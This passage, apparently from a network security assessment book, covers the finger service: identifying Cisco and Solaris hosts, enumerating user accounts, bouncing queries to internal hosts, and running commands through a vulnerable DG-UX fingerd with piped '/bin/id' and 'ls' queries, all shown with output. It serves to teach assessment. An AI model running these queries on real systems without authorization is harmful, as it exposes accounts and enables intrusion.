5.4 finger

The fingerd service is commonly found listening on TCP port 79 of Cisco IOS routers. Default out-of-box builds of many commercial Unix-based systems also run the service, including Solaris and BSDI.

The service can be queried using a finger client (found in most operating platforms) or by directly using telnet to connect to port 79. Two examples of this follow, in which I show the differences in results from querying a Cisco IOS device and a Solaris server.

Here's a finger query against a Cisco router using telnet:

# telnet 192.168.0.1 79

Trying 192.168.0.1...

Connected to 192.168.0.1.

Escape character is '^]'.



    Line     User      Host(s)                  Idle Location

*  1 vty 0             idle                 00:00:00 192.168.0.252

  Se0                  Sync PPP             00:00:00

Connection closed by foreign host.

Here the finger command queries a Solaris host:

# finger @192.168.0.10

[192.168.0.10]

Login       Name               TTY         Idle    When    Where

crm      Chris McNab           pts/0          1 Tue 09:08  onyx

axd      Andrew Done           pts/4         3d Thu 11:57  goofball

A null query will result in the current users being shown under most fingerd services. From analyzing the format of the response, you can easily differentiate between a Sun Solaris host and a Cisco IOS router.

5.4.1 finger Information Leaks

Various information leak vulnerabilities exist in fingerd implementations. A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. Example 5-9 highlights a bug present in all Solaris releases up to Version 8; it lets you identify user accounts on the target system.

Example 5-9. Gleaning user details through Solaris fingerd
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10

[192.168.0.10]

Login       Name               TTY         Idle    When    Where

root     Super-User            console      <Jun  3 17:22> :0 

admin    Super-User            console      <Jun  3 17:22> :0

daemon          ???                         < .  .  .  . >

bin             ???                         < .  .  .  . >

sys             ???                         < .  .  .  . >

adm      Admin                              < .  .  .  . >

lp       Line Printer Admin                 < .  .  .  . >

uucp     uucp Admin                         < .  .  .  . >

nuucp    uucp Admin                         < .  .  .  . >

listen   Network Admin                      < .  .  .  . >

nobody   Nobody                             < .  .  .  . >

noaccess No Access User                     < .  .  .  . >

nobody4  SunOS 4.x Nobody                   < .  .  .  . >

informix Informix User                      < .  .  .  . >

crm      Chris McNab           pts/0          1 Tue 09:08  onyx

axd      Andrew Done           pts/4         3d Thu 11:57  goofball

Many Unix fingerd services perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd file; the following finger command-line options can obtain useful information:

finger 0@target.host

finger .@target.host

finger **@target.host

finger user@target.host

finger test@target.host

Performing a finger user@target.host request is especially effective against Linux, BSD, Solaris, and other Unix systems, because it often reveals a number of user accounts, as shown in Example 5-10.

Example 5-10. Gathering user details through standard fingerd services
# finger user@192.168.189.12

Login: ftp                              Name: FTP User

Directory: /home/ftp                    Shell: /bin/sh

Never logged in.

No mail.

No Plan.



Login: samba                            Name: SAMBA user

Directory: /home/samba                  Shell: /bin/null

Never logged in.

No mail.

No Plan.



Login: test                             Name: test user

Directory: /home/test                   Shell: /bin/sh

Never logged in.

No mail.

No Plan.

5.4.2 finger Redirection

In some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details as follows:

# finger @192.168.0.10@217.34.17.200

[217.34.217.200]

[192.168.0.10]

Login       Name               TTY         Idle    When    Where

crm      Chris McNab           pts/0          1 Tue 09:08  onyx

axd      Andrew Done           pts/4         3d Thu 11:57  goofball

5.4.3 Directly Exploitable finger Bugs

Poorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems). Example 5-11 shows a vulnerable finger service running on a DG-UX platform being exploited to return the current user ID and network statistics.

Example 5-11. Executing commands through DG-UX fingerd
# finger "|/bin/id@192.168.0.135"

[192.168.0.135]

uid=0(root) gid=0(root)



# finger "|/bin/ls -a /@192.168.0.135"

[192.168.0.135]

total 7690

drwxr-xr-x  15 root  root       512 Jul 22  2002 .

drwxr-xr-x  15 root  root       512 Jul 22  2002 ..

drwxr-xr-x   2 root  bin       1024 Mar  1  2002 bin

-r-xr-xr-x   1 root  wheel    53248 Feb 19  2002 boot

drwxr-xr-x   4 root  wheel    15360 Jun 26 09:50 dev

drwxr-xr-x  18 root  wheel     2560 Oct 12 03:32 etc

drwxr-xr-x   9 root  wheel      512 Oct 12 03:25 home

drwxr-xr-x   4 root  wheel      512 Apr 10  2002 mnt

drwx------  24 root  root      1536 Jun 26 09:41 root

drwxr-xr-x   2 root  bin       2048 Oct 18  2001 sbin

drwxr-xr-x   2 root  wheel      512 Oct 18  2001 stand

lrwxr-xr-x   1 root  wheel       12 Mar 16  2002 sys -> /usr/src/sys

drwxrwxrwt   4 root  wheel      512 Oct 20 18:05 tmp

drwxr-xr-x  15 root  wheel      512 Oct 18  2001 usr

drwxr-xr-x  25 root  wheel      512 May 23  2002 var

Serious buffer overflow vulnerabilities exist in many Linux finger daemons, including cfingerd. At the time of writing, cfingerd 1.4.3 and prior running on Linux (particularly Debian and Red Hat Linux distributions) is especially susceptible to a plethora of remote and locally exploitable bugs. For current details of publicly available finger exploits, you can search Packet Storm for "finger exploit" or the MITRE CVE list at http://cve.mitre.org.



     
    ASPTreeView.com
     
    Evaluation has »ЖК¶іјіµexpired.
    Info...